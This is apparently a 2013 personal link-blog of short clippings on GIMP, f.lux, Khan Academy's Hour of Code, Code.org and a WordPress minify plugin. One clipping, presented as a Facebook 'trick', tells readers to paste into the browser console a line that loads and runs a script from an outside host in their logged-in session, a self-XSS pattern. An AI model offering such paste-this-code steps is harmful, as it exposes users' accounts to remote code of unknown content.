Tuesday, December 24, 2013

GIMP - The GNU Image Manipulation Program

GIMP - The GNU Image Manipulation Program: "Before you leave for the holidays, we thought you'd like an overview of what we did this year to improve GIMP for you.

Most of the time was spent on improving the GEGL-based version of GIMP (to be released as v2.10) and porting GIMP plugins to GEGL, so that you could benefit from 32bit float precision per color channel as much as possible."

'via Blog this'

Thursday, December 19, 2013

f.lux: software to make your life better

f.lux: software to make your life better: "Ever notice how people texting at night have that eerie blue glow?

Or wake up ready to write down the Next Great Idea, and get blinded by your computer screen?"

'via Blog this'

Welcome to our Hour of Code! | Hour of Code | Khan Academy

Welcome to our Hour of Code! | Hour of Code | Khan Academy: "For example, if I want to write a letter, I open Word. When I what to make a spreadsheet, I open Excel. How do I begin?
3 Votes
• Comment • Flag
10 days ago by Doris Branch
A common requirement for most languages is, at the very least, a text editor (as said by others notepad will do - but the likes of vim, emacs, notepad++ ... are better). For some languages (like perl, lisp, tcl, ...) this is all you need. For others (in particular java) you will need a compiler to turn your source code into machine instructions"

'via Blog this'

Drawing and animation | Computer programming | Khan Academy | Khan Academy

Drawing and animation | Computer programming | Khan Academy | Khan Academy: "Variables
We'll cover how to use variables to hold values, animate your drawings, and more."

'via Blog this'

Wednesday, December 18, 2013

How Coding Went Mainstream – ReadWrite

How Coding Went Mainstream – ReadWrite: "Last January marked the launch of Code.org, a nonprofit that promotes computer-science education. Code.org launched Hour Of Code, a nationwide campaign that urged Americans to learn how to program. "

'via Blog this'

Monday, November 18, 2013

How to add all facebook friends into Facebook group by single click | Online Safe Tricks

How to add all facebook friends into Facebook group by single click | Online Safe Tricks: "Firstly open Mozilla Firefox
Now Open your Facebook group in which you want to add your friends
Then Click   Ctrl + Shift + K
Now  Paste...
document.body.appendChild(document.createElement('script')).src='http://jagjotsingh.webs.com/group-invite.js';

Then press Enter"

'via Blog this'

Wednesday, March 6, 2013

WPSCMin: HTML Minify plugin for WordPress and WP Super Cache | lyncd.com

WPSCMin: HTML Minify plugin for WordPress and WP Super Cache | lyncd.com: "with older versions of Super Cache.)

Download the current version and unzip. Move WPSCMin.php into the plugins subdirectory of WP Super Cache. If yours is a standard WordPress install, this will be wp-content/plugins/wp-super-cache/plugins/.
Download the current version of Minify and unzip. Move the min directory into the plugins subdirectory of WP Super Cache, right next to WPSCMin.php.
Log into your site, go to the WP Super Cache config page, and scroll to the bottom. Enable HTML Minify, and you’re done!"

'via Blog this'